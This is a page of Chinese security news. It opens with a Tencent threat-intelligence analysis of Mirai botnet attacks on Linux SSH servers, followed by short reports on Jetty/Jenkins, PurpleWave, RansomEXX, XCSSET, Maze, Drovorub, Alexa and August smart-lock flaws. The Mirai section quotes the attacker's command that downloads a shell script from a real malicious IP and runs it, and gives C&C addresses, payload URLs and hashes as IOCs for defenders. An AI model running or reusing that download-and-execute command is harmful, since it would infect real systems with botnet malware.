感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/8yTiVyxC6_aapGhrTs1uWw     腾讯安全威胁情报中心检测到Mirai僵尸网络大规模攻击Linux服务器。攻击者针对Linux服务器的SSH（22端口）进行弱口令爆破攻击，成功登陆后执行shellcode下载shell脚本，然后通过shell脚本依次下载基于多个系统平台的Mirai僵尸网络二进制木马程序。 一、概述 腾讯安全威胁情报中心检测到Mirai僵尸网络大规模攻击Linux服务器。攻击者针对Linux服务器的SSH（22端口）进行弱口令爆破攻击，成功登陆后执行shellcode下载shell脚本，然后通过shell脚本依次下载基于多个系统平台的Mirai僵尸网络二进制木马程序。 Mirai是一个大型僵尸网络，主要通过SSH和telnet弱口令进行感染，攻击目标包括监控摄像头、路由器等物联网设备以及Linux服务器，控制机器后通过C&C服务器下发命令进行DDoS攻击。根据腾讯安全威胁情报中心监测数据，Mirai僵尸网络已在全国造成上万台设备感染，其中感染最多的为广东、上海和北京。 腾讯安全专家建议企业linux管理员避免使用弱口令，关闭非必须启用的端口，以防御黑客利用弱口令爆破的方式远程入侵，腾讯安全系列产品也针对Mirai僵尸网络的技术特点进行响应，清单如下： 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）Mirai僵尸网络相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1）Mirai僵尸网络相关信息和情报已支持检索。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 （Cloud Firewall，CFW） 基于网络流量进行威胁检测与主动拦截，已支持： 1）Mirai僵尸网络关联的IOCs已支持识别检测； 2）告警弱口令爆破行为。 有关云防火墙的更多信息，可参考： https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 （Cloud Workload Protection，CWP） 1）已支持查杀Mirai僵尸网络相关木马程序； 2）告警弱口令爆破行为。 腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 1）已支持通过协议检测Mirai僵尸网络木马与服务器的网络通信。 关于T-Sec高级威胁检测系统的更多信息，可参考： https://cloud.tencent.com/product/nta 更多产品信息，请参考腾讯安全官方网站https://s.tencent.com/ 二、详细分析 攻击者通过SSH（22端口）弱口令爆破进行远程攻击，攻击成功后执行如下shellcode： cd /tmp || cd /run || cd /; wget http[:]//193.228.91.123/reportandyougaybins.sh; chmod 777 reportandyougaybins.sh; sh reportandyougaybins.sh shellcode使用wget下载shell脚本reportandyougaybins.sh到/tmp目录下并通过sh执行，reportandyougaybins.sh脚本内容如下： reportandyougaybins.sh主要功能为下载和执行二进制木马程序，会分别从以下地址下载基于多个架构体系的样本，其中i586、i686、x86可感染基于Intel处理器的Linux服务器： http[:]//193.228.91.123/mips http[:]//193.228.91.123/mipsel http[:]//193.228.91.123/sh4 http[:]//193.228.91.123/x86 http[:]//193.228.91.123/armv6l http[:]//193.228.91.123/i686 http[:]//193.228.91.123/powerpc http[:]//193.228.91.123/i586 http[:]//193.228.91.123/m68k http[:]//193.228.91.123/sparc http[:]//193.228.91.123/armv4l http[:]//193.228.91.123/armv5l 以i586为例进行分析，该样本的主要功能为与C&C地址通信，接收远程命令对目标发起DDOS攻击。在IOT设备中，通常会有看门狗（watchdog）进程，不断给看门狗进程发送发送心跳可以保持设备不重启。Mirai首先尝试发送控制码0x80045704来关闭看门狗功能，如果未成功关闭，则进入循环不断向其发送保活指令0x80045705。 将木马进程名替换为”/usr/sbin/dropbear”或者”sshd”隐藏自身。 从/proc/net/route中获取本机IP。 初始化table，并将后续要使用的数据添加到table中。 然后table_retrieve_val从table中取出数据，table_lock_val和table_unlock_val分别为加密和解密数据，解密函数在toggle_obf()中实现，解密方法是将数据与table_key进行循环异或，其中table_key=0xDEDEFFBA。 解密并连接C&C服务器194.180.224.103:3982，然后向其发送字符串解密并连接C&C服务器194.180.224.103:3982，然后向其发送字符串“arch xxx”，xxx为设备平台类型。 Mirai与C&C服务器通信TCP流： 获取C&C服务器返回的数据后，进入processCmd处理接收到的命令。 Mirai可根据命令向目标发起以下类型的DDoS攻击：”HTTP”、”CUDP”、”UDP”、”STD”、”CTCP”、”TCP”、”SYN”、”ACK”、”CXMAS”、”XMAS”、”CVSE”、”VSE”、”CNC”。 HTTP攻击： UDP攻击： TCP攻击： SYN攻击： ACK攻击： IOCs IP 193.228.91.123 194.180.224.103 45.95.168.138 45.95.168.190 37.49.224.87 193.228.91.124 185.172.110.185 C&C 194.180.224.103:3982 MD5 649a06f5159fc4e8ee269a9e0e1fd095 8bb40eb446abb7472cb3a892fd2450b4 3f3f8184219514d5834df94f362c74bc ef3b89e44a3a4973575a876ee5105cec 34033f561d196495e5c4780327acca0a 6f637a4ccfd00d9c2e08ecb84ce0b987 03ff0f5521631db7fa0d7990b5b4c19e 91c0f5304438a42ae5f28c8c0ff15954 536accde3643cb8294dd671ae5bdb3a2 9789917095d92cfe507e5fc2266667a1 8bafcd3d57dc597af4b6cb497cf0a0de 7e8e28631962dd5d52cbd93e50e7916e 7bfd106fe9d41c658f3be934346d3ff6 f0d5b7e31b4308c5ec326de9304bd3f4 bd1db394d52b950eed972eae93b80469 8b49a58a0bcb93afe72f1e3c1d800515 97a3699b819496892788b5c7a24be868 990fe40e991b9813a4f73b115ba160cb 2c0cc3d82871cfc05d38ea0a04f7f80a 26c56b011a494886e758d12fc07f6951 6e6d56669554c492ec4b1a9abd23e35b 64e5195e9cde652de6b2623d2d3e098d 1eeee50672a42dc2e55c6d4126afaf26 f6bbcf50aeda03aab1b5bc21b3df3e99 8e7d3e4bedf9bc3ed8a67890edc36590 556bd1d4d93abf19b4075d12ffef02a8 0d5302aa5491b3944566a212ca205923 ef72d6cc859438142a166f1d3ea4d462 193f92152f483aeb7ebe6d42855d9f27 1de00b44ef800a9d878de591fc43b854 b6e5bfb4b2f75d828022b84a247e99f2 039f379f3a36b4ab982a5ada7ceea078 51547b23165bc6f205ec3625840f3800 92137cf8ff782e15995919ebaa658474 94e027f4d33900f116bcf176aba726de aefe0411bd89a9b97c1741b75c9f7d71 d15256b7a475f8934daf79364b0885a1 c624ed18ad756aa6f41a70fe90102d78 5ff2fc4de3a059b504e09b7b1663ac1f fe6d19da030b1d299c35e89639d567bd 24a2659c72a980997161950926063b84 51b2190aa408ae08c6c9bf8dc8acc6e0 ecd696438914cc3c60dbf6de0df48f87 b45af2197eb3d12a199a40a048a36db6 32ef86b0358793f7ceffe1822bbf70e1 60fd7ed2e1ad0d41875d761b899766c4 0970f7f309bc678b0117d600e3f80f5f a1dc1c62dba56af6a8b25767074d691d 1cca73d23c7e50f4111815e840bd8960 42c87649e776dd73aa06033f9b8b750e 08dc3f3c77161e1cc349d91263f76b8c 61915eb8d8742fea42d3683c7255945a 000466d4c6c06398042851a7c049f6b6 0be41e0b52c51ab4ad966513455550b1 6290db15f07f6ebb114824b912a10129 fe19b99077ef4fe492107e4a9b943094 9068c1c69ab5c6ba80f01bab1a1a2ad4 8bb40eb446abb7472cb3a892fd2450b4 2b8796693b5f578c40611e5221fb4788 9f71d8839d89f7bed716bb3f509eb22f 47f12cf0806d2875c592a7d15e266ee6 8ee73860cfe02ca529671c060c18cf00 9e91347c4d8afad598d21e446f967fb2 71d2dc0728e710e4f939c97e88929930 672380fd4c58302e1c48a45e75c580d7 143f7de27921db16b08cea70bb3bef7b 63db9805775b20dae4c0f06e03585446 4a751ef5ef5e48cfef33bd29e2a4a5b7 00bf4ee5a64971260683e047719c0dd8 028b7629ff410f429ba65db1f6779226 URL http[:]//193.228.91.123/ares.sh http[:]//193.228.91.123/arm7 http[:]//193.228.91.123/armv6l http[:]//193.228.91.123/i686 http[:]//193.228.91.123/33bi/Ares.ppc http[:]//193.228.91.123/33bi/Ares.arm6 http[:]//193.228.91.123/33bi/ares.armebv7 http[:]//193.228.91.123/33bi/ares.mips http[:]//193.228.91.123/33bi/Ares.m68k http[:]//193.228.91.123/33bi/ares.mpsl http[:]//185.172.110.185/taevimncorufglbzhwxqpdkjs/Meth.ppc http[:]//185.172.110.185/taevimncorufglbzhwxqpdkjs/Meth.m68k http[:]//185.172.110.185/taevimncorufglbzhwxqpdkjs/Meth.spc http[:]//185.172.110.185/taevimncorufglbzhwxqpdkjs/Meth.i686 http[:]//185.172.110.185/taevimncorufglbzhwxqpdkjs/Meth.sh4 http[:]//185.172.110.185/taevimncorufglbzhwxqpdkjs/Meth.arc http[:]//193.228.91.123/FuckBitchBastardDamnCuntJesusHaroldChristbins.sh http[:]//193.228.91.123/reportandyougaybins.sh http[:]//193.228.91.123/mips http[:]//193.228.91.123/mipsel http[:]//193.228.91.123/sh4 http[:]//193.228.91.123/x86 http[:]//193.228.91.123/armv6l http[:]//193.228.91.123/i686 http[:]//193.228.91.123/powerp http[:]//193.228.91.123/i586 http[:]//193.228.91.123/m68k http[:]//193.228.91.123/sparc http[:]//193.228.91.123/armv4l http[:]//193.228.91.123/armv5l http[:]//194.180.224.103/mips http[:]//194.180.224.103/mipsel http[:]//194.180.224.103/sh4 http[:]//194.180.224.103/x86 http[:]//194.180.224.103/armv6l http[:]//194.180.224.103/i686 http[:]//194.180.224.103/powerpc http[:]//194.180.224.103/i586 http[:]//194.180.224.103/m68k http[:]//194.180.224.103/sparc http[:]//194.180.224.103/armv4l http[:]//194.180.224.103/armv5l 参考链接： https://www.freebuf.com/articles/terminal/117927.html http://blog.nsfocus.net/mirai-source-analysis-report/

Jenkins发布了一篇关于jettyweb服务器中一个严重漏洞的公告，该漏洞可能导致内存损坏，并导致机密信息泄露。该漏洞的编号为CVE-2019-17638，CVSS等级为9.4，影响范围为Eclipse Jetty版本9.4.27.v20200227至9.4.29.v20200521。 “该漏洞允许未经身份验证的攻击者获取HTTP响应标头，其中可能包含针对其他用户的敏感数据。” 这个影响Jetty和Jenkins核心的漏洞似乎是在Jetty版本9.4.27中引入的，该版本添加了一个机制来处理大型HTTP响应头并防止缓冲区溢出。 Jetty项目负责人GregWilkins说：“问题是在缓冲区溢出的情况下，我们释放了头缓冲区，但没有使字段为空。” 为解决此问题，Jetty引发异常以产生HTTP 431错误，该错误导致HTTP响应标头两次释放到缓冲池中，进而导致内存损坏和信息泄露。 因此，由于双重释放，两个线程可以同时从池中获取相同的缓冲区，并且可能允许一个请求访问由另一个线程写入的响应，该响应可能包括会话标识符、身份验证凭据和其他敏感信息。 换句话说，“当thread1要使用ByteBuffer写入response1数据时，thread2用response2数据填充ByteBuffer。然后，Thread1继续写入现在包含response2数据的缓冲区。这导致client1发出了request1并期望响应，看到response2可能包含属于client2的敏感数据。” 在一种情况下，内存损坏使得客户端能够在会话之间移动，从而可以进行跨帐户访问，因为来自一个用户响应的身份验证cookie被发送到另一用户，从而允许用户A跳入用户B的会话。 披露安全隐患后，上个月发布的Jetty 9.4.30.v20200611解决了该漏洞。Jenkins在昨天发布的Jenkins 2.243和Jenkins LTS 2.235.5中修复了其实用程序中的缺陷。 建议Jenkins用户将他们的软件更新到最新版本，以缓解该漏洞的危害。     稿件与封面来源：The Hacker News，译者：芋泥啵啵奶茶。 本文由 HackerNews.cc 翻译整理， 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

Infostealer是网络犯罪分子最赚钱的工具之一，因为从感染了该恶意软件的系统收集的信息可以在地下网络犯罪分子中出售或用于凭据填充攻击。Zscaler ThreatLabZ团队遇到了一个名为PurpleWave的新Infostealer，它是用C ++编写的，并自动将其静默安装到用户的系统上。它连接到命令和控制（C＆C）服务器以发送系统信息，并将新的恶意软件安装到受感染的系统上。 该恶意软件的作者在俄罗斯网络犯罪论坛上销售PurpleWave，终身更新的费用为5,000 RUB（US 54）。 图1：俄罗斯论坛上的PurpleWave销售帖子出售PurpleWave的作者声称，这种窃取程序能够窃取Chromium和Mozilla浏览器的密码，cookie，卡以及自动填充形式。该窃取程序还会从指定路径中收集文件，进行屏幕截图并安装其他模块。     … 更多内容请至Seebug Paper 阅读全文：https://paper.seebug.org/1298/ 消息与封面来源：zscaler，译者：叶绿体 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。  

勒索软件攻击渗透到各行各业，影像行业也不例外。 近日，日本影像科技巨头柯尼卡美能达企业服务近一周。该勒索事件发生在7月底，影响了商业技术巨头柯尼卡美能达企业服务近一周。 柯尼卡美能达是日本跨国商业技术巨头，拥有近44000名员工，2019年的收入超过90亿美元。企业提供大规模的服务和多种产品，从打印解决方案，医疗技术到为企业提供托管等IT服务。 始于网站停机机 2020年7月30日，有客户反馈柯尼卡美能达产品供应与支持网站无法访问，并呈现以下信息： 柯尼卡美能达“ MyKMBS”客户门户暂时不可用。我们正在努力解决此问题，对于指出给您带来的任何不便，我们深表遗憾意。如果您亟需服务帮助，请致电1-800- 456-5664（美国）或1-800-263-4410（加拿大）致电我们的全球客户服务。 网站关闭了近一周，客户也并不清楚网站无法访问的具体原因。某些柯尼卡美能达打印机还显示“服务通知失败”错误，该组织也及时更新了网站停止访问的消息。 遭遇RansomEXX勒索 随后，网上传出黑客勒索柯尼卡美能达使用的退款金票据的副本。如下图所示，该退款金记录称为“！KONICA_MINOLTA_README !!。txt，”公司设备都被加密了，文件也加上了“ .K0N1M1N0”的扩展后缀。 RansomEXX是一种新型勒索软件，因攻击了德克萨斯州交通运输部的网络在今年6月首次被发现。和其他勒索软件一样，以企业为目标，但是和其他通过网络钓鱼和恶意软件分发的勒索软件不同的是，RansomEXX需要人为纠正。执行攻击后，勒索软件将打开一个控制台，该控制台在攻击者运行时向其显示信息。 黑客入侵企业网络潜藏，并通过时间的流逝，再传播到其他设备以获取管理员位置。一旦获得管理员权限并访问Windows域控制器，他们便可以在网络上部署勒索软件并提供所有设备进行加密。 Ransom X在整个加密过程中插入的命令，这些命令包括： 清除Windows事件日志 删除NTFS日记 补充系统还原 局部Windows恢复环境 删除Windows备份目录 清除本地驱动器上的可用空间。     （稿件与封面来源：FreeBuf）

趋势科技本周四报告称，在多个 Xcode 项目中发现了 XCSSET 恶意软件系列，发现了导致恶意有效荷载的兔子洞（rabbit hole）。在探索讨论攻击行为的报告[PDF]中，网络安全研究人员表示在其中一个开发者项目中“不寻常”感染还发现了两个零日漏洞。 Xcode 是 macOS 系统中用于开发苹果相关软件和应用的免费集成开发环境（IDE）。虽然目前还不清楚 XCSSET 是如何感染到 Xcode 项目中的，可一旦被嵌入，恶意软件就会在项目构建时运行。 该团队表示：“根据推测，这些系统主要由开发人员使用。这些 Xcode 项目已经被修改，在构建时，这些项目将运行一个恶意代码。这最终会导致主要的XCSSET恶意软件被丢弃并在受影响的系统上运行”。 一些受影响的开发者已经在 GitHub 上分享了他们的项目，研究人员表示针对 Mac 用户的一项运动正在推广 XCSSET恶意软件套件，它能够劫持Safari网络浏览器，并注入各种 JavaScript 有效负载，这些负载可以窃取密码、金融数据和个人信息，部署赎金等。 隐藏在项目中的初始有效载荷以Mach-O可执行文件的形式出现。研究人员能够追踪受感染项目的Xcode工作数据文件，并发现一个隐藏文件夹中包含Mach-O，位于其中一个.xcodeproj文件中。     （稿源：cnBeta，封面源自网络）

摘要 Maze勒索软件是目前在野外使用最广泛的勒索软件之一，由具有能力的参与者进行分发。 我们发现了一个Maze分支机构，在交付勒索软件之前部署了量身定制的持久性方法。 行动者似乎使用了被盗的证书在其信标上签名。 与其他攻击一样，行动者使用HTA有效载荷作为交互式外壳，能够捕获到实时的和去模糊化的内容。 背景 Maze勒索软件在过去的大约一年时间里被广泛使用，成为全世界许多不同参与者的最终有效载荷。今年，臭名昭著的Maze运营商不仅开始通过加密文件勒索公司，而且威胁会在线发布被窃取的文件，从而勒索公司。最近，我们抓住了一个Maze会员，该会员尝试通过借由我们客户的网络进行传播。 在这篇文章中，我们分享有关该Maze会员使用方法的详细信息，以阐明他们的策略并帮助安全团队在其自己的网络中寻找类似的IOC。   … 更多内容请至Seebug Paper 阅读全文：https://paper.seebug.org/1294/ 消息与封面来源：SentinelLABS，译者：叶绿体 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

在民主党和共和党准备从下周开始举行全国大会之际，YouTube周四宣布更新其关于欺骗性视频和其他旨在干扰选举内容的政策。 这家每月拥有超过20亿用户的全球最大视频平台将禁止含有通过黑客攻击获得的、可能干预选举或人口普查的视频。这将包括像被黑客攻击获得的竞选邮件这样的材料，其中有关于候选人的细节。 在更新之后，拥有YouTube的谷歌在本月早些时候公布了类似的规则，禁止包含黑客信息的广告。谷歌将于9月1日开始执行该政策。YouTube还表示，将下架那些鼓励人们干预投票和其他民主进程的视频。例如，告诉人们在投票点排长队以扼杀投票的视频将不被允许。 新政策是在民主党全国代表大会之前出台的，大会周一开始，随后是本月晚些时候共和党的活动。这些大会标志着美国总统大选季开始。随着大选进入高潮，前副总统乔拜登本周早些时候任命加州参议员卡马拉-哈里斯为其竞选搭档，硅谷公司一直急于证明他们能够避免2016年遇到的陷阱。那次选举受到了俄罗斯的干扰，俄罗斯利用谷歌、Facebook和Twitter的平台试图影响选举结果。 本周早些时候，包括谷歌，Facebook，Twitter，Reddit和微软在内的几家大型科技公司宣布成立一个联盟，与美国政府机构合作保护选举的完整性。YouTube表示，它将直播这两场大会，为了遏制冠状病毒的传播，这两场大会转播将以虚拟方式进行。该视频平台还表示，当人们在YouTube上搜索总统和联邦候选人时，它将增加新的信息面板。这些面板将包括该人的姓名、党派，还将提供候选人的官方视频频道链接。 YouTube还试图确保其平台不受外国行为者的影响。上周，该公司表示，作为对该网站 “协调影响行动 “调查的一部分，它禁止了近2600个相关频道。YouTube还下架了几十个与俄罗斯和伊朗有关的频道，这些频道显然与影响美国选举活动有关。谷歌周四表示，将向人们提供更多信息，让人们了解在谷歌和YouTube上运行的政治广告背后是谁。谷歌两年前首次开始发布该公司的政治广告透明度报告，现在这份报告将包括新的方式来分类竞选支出。     （稿源：cnBeta，封面源自网络。）

美国国家安全局(NSA)和联邦调查局(FBI)近日发布的新闻稿中，共同披露了俄罗斯军事黑客在网络间谍活动中所使用的恶意软件。本周四披露的详细报告中，为俄罗斯总参谋部总情报局第 85 军特殊服务中心（第26165部队）工作的黑客利用名为“Drovorub”的恶意程序，专门针对 Linux 系统发起攻击。 这些黑客也被称之为 APT28 或者 Fancy Bear，他们于 2016 年入侵了民主党全国委员会，并经常向国防、政府、航空航天等领域发起进攻。 虽然在这份警报中并未包含有关于“Drovorub”受害者的具体细节，不过美国官员表示已经于本周四向多家机构发出警报，提高人们对黑客入侵和国防部门漏洞的认识。 国家安全局和联邦调查局在报告中说：“该恶意软件已经构成了威胁，因为目前美国的国家安全系统，国防部和国防工业基地中广泛使用 Linux 系统的”。     （稿件与封面来源：cnBeta）

据外媒neowin报道，安全研究人员在亚马逊的Alexa语音平台上发现了一个漏洞。Check Point Research表示，当漏洞被利用时，攻击者可能会获得用户的个人信息，这些信息包括用户的亚马逊账号信息以及语音历史。 研究人员在对Alexa智能手机应用进行测试时发现了这个漏洞。他们使用一个脚本绕过了保护应用流量的机制，该机制则允许他们以明文查看该应用。他们还发现，该应用发出的几个请求存在策略配置错误情况，这可能会使其绕过该策略从而从恶意方控制的域发送请求。 在现实世界中，坏人可能会说服不知情的用户点击一个连接到Amazon的恶意链接，该链接实际上具有代码注入功能。一旦被点击，攻击者就能获得用户在Alexa上安装的应用和功能列表。另外，他们还可以远程为受害者安装和启用新技能。更严重的攻击者还可以从用户的Alexa账号中获取他们的语音历史以及个人信息。 Check Point的产品漏洞研究负责人Oded Vanunu在一份新闻稿中说道：“智能扬声器和虚拟助手如此普遍，以至于人们很容易忽视它们所拥有的个人数据以及它们在控制我们家中其他智能设备方面所起的作用。但黑客将其视为进入人们生活的入口，让他们有机会在所有者不知情的情况下访问数据、窃听对话或进行其他恶意行为。” Vanunu补充称，该研究公司在6月份就向亚马逊强调过这一缺陷，后者也做出了修复回应。“我们开展这项研究是为了强调保护这些设备对维护用户隐私是怎样得重要。谢天谢地，亚马逊对我们的泄露做出了迅速反应，他们关闭了某些亚马逊/Alexa子域名上的这些漏洞。”     （封面与稿件来源：cnBeta）

如果你使用了智能门锁，并且使用的是August smart lock Pro + Connect的话，请注意，该门锁中未打补丁的安全漏洞意味着黑客可以完全访问你的Wi-Fi网络。 首先，August smart lock Pro + Connect门锁允许用户控制房屋的大门或其他地方，房主只需轻按即可解锁/锁定门，还能授予客人访问权限，监督其他人进入或离开房屋。 由于缺乏必要的硬件，该设备无法直接连接到互联网，因此，当用户在一定范围内时，可以通过蓝牙低能耗（BLE）控制锁定。而为了满足远程管理的需求，August应用程序形成了一个+ Connect Wi-Fi网桥，与互联网建立连接，再由控制智能锁的用户来回传递命令。 然而，在这种情况下，设备之间的命令用传输层安全（TLS）加密，不能以任何方式修改或利用。除此之外，只有所有者在其帐户中注册了锁，才能配置与无线网络相连的August连接。而用户通过两步验证获得对帐户的访问权限，因此所有者具有完全权限，可以授予访客全部或有限访问权限，接收即时通知并检查状态。 当然，为了实现这些功能，August Smart Lock Pro + Connect会连接到用户的Wi-Fi网络。在没有可用的键盘/输入设备的情况下，August使用一种通用技术来确保连接。该设备进入设置模式，作为接入点启用与智能手机的链接。随后，应用程序会将Wi-Fi登录凭据传递给智能锁，但这个通信是开放的（未加密），因此容易受到攻击。值得注意的是，虽然设备的固件会加密登录凭据，但使用的是ROT13，这是一种简单的密码，很容易被附近的黑客破解。 最后，不得不提一下漏洞从发现到披露的过程： 2019年12月9日：与受影响的供应商进行初步联系，交换了PGP密钥 2019年12月10日：供应商提前收到报告的副本 2019年12月18日：信息再次发送给受影响的供应商 2019年12月18日：漏洞已确认 2019年12月18日：CVE-2019-17098 2020年5月11日：供应商要求在2020年6月上旬安排公开信息 2020年1月16日：Bitdefender准备更新 2020年7月2日：Bitdefender准备另一次更新 2020年8月6日：Bitdefender没有收到供应商的回音，公开漏洞。 将近8个月后，这个漏洞依然存在。     （稿件与封面来源：FreeBuf）